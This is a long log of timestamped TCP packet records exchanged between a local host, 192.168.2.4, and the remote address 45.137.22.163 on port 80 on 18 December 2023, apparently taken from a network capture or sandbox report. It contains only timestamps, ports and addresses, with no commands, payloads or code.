                                        Dec 18, 2023 14:31:27.565876961 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.565901995 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.565931082 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.566011906 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.566046953 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.566054106 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.566128969 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.566164017 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.566164970 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.566212893 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.566250086 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.567167997 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.567230940 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.567241907 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.567267895 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.567327023 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.567431927 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.567467928 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.567549944 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.567625046 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.567667007 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.567722082 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.567770004 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.567811012 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.567887068 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568000078 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568023920 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568037987 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.568123102 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568212986 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568249941 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.568253040 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568319082 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568356037 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.568375111 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568439007 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568464041 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568474054 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.568550110 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568562984 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568589926 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.568609953 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568675995 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568712950 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.568737984 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568780899 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568818092 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.568841934 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568880081 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568917990 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.568965912 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.568978071 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.569015980 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.569045067 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.569106102 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.569139957 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.569164038 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.569227934 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.569267035 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.569286108 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.569353104 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.569392920 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.569437981 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.569451094 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.569484949 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.569514990 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.569578886 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.569591999 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.569617033 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.569669008 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.569709063 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.569863081 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.569910049 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.569950104 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.569968939 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570020914 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570060015 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.570061922 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570127010 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570162058 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.570197105 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570238113 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570276022 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.570281982 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570322990 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570357084 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.570377111 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570475101 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570530891 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.570544004 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570660114 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570702076 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.570713997 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570756912 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570797920 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.570801973 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570858002 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570899963 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.570913076 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570960045 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.570997953 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.571033001 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571075916 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571115971 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.571162939 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571172953 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571225882 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571261883 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.571278095 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571312904 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571350098 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.571369886 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571432114 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571470022 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.571475983 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571543932 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571580887 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.571585894 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571656942 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571697950 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.571717024 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571769953 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571806908 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.571820974 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571880102 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571918011 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.571938038 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.571984053 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.572016954 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.572021961 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.572093964 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.572138071 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.572153091 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.572208881 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.572244883 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.572251081 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.572261095 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.622865915 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.801923990 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.801938057 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.801970005 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802007914 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802011967 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802053928 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802067041 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802115917 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802155972 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802172899 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802190065 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802228928 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802229881 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802242041 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802253008 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802268982 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802277088 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802282095 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802310944 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802366972 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802380085 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802391052 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802402020 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802412033 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802423954 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802560091 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802572012 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802582979 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802596092 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802609921 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802625895 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802637100 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802649021 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802670956 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802691936 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802691936 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802728891 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802731991 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802745104 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802772045 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802774906 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802800894 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802839041 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802874088 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802886009 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802896976 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802908897 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802916050 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802918911 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802938938 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802957058 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.802978039 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.802983999 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803000927 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.803040028 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803067923 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803078890 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.803086042 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803109884 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803127050 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.803143978 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803154945 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803191900 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.803221941 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803235054 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803246975 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803277969 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803286076 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.803291082 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803320885 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803320885 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.803345919 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803364038 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803364992 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.803388119 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803405046 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.803436041 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803478003 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.803508043 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803561926 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803572893 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803601027 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.803648949 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803695917 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803736925 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.803790092 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803802967 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803834915 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.803860903 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803956985 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803968906 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.803994894 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.804014921 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804025888 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804056883 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.804064989 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804114103 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804126024 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804153919 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.804161072 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804173946 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804187059 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804200888 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.804231882 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.804234982 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804248095 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804256916 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804275036 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.804287910 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804300070 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804310083 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804322004 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804332972 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.804363966 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.804429054 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804441929 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804456949 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804470062 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804481030 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804483891 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.804512024 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.804517984 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804531097 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804563046 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.804574013 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804584026 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804615021 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.804650068 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804661989 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804708004 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.804796934 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804809093 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804840088 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804843903 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.804907084 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804949045 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804950953 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.804960012 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804972887 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.804997921 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.805027008 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.805038929 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.805049896 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.805059910 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.805074930 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.805105925 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.805840969 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.805854082 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.805862904 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.805880070 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.805901051 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.805921078 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.805928946 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.805947065 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.805958986 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.805985928 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.806001902 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806014061 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806042910 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.806061983 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806075096 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806111097 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.806140900 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806170940 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806184053 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806210995 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.806257963 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806269884 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806281090 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806291103 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806297064 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.806303978 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806314945 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.806366920 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806380033 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806408882 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.806408882 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806421041 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806451082 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.806735992 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806747913 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806776047 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806798935 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.806824923 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.806868076 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.806924105 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807015896 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807029009 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807040930 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807070017 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.807076931 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807080984 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.807135105 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807199001 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807235956 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807241917 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.807301044 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807312012 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807341099 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.807360888 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807410955 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807450056 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807452917 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.807508945 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807549000 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.807578087 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807712078 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807754993 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807760954 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.807811022 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807852983 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.807867050 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807929039 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.807970047 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.807991028 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808049917 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808092117 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.808120966 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808134079 CET804973745.137.22.163192.168.2.4
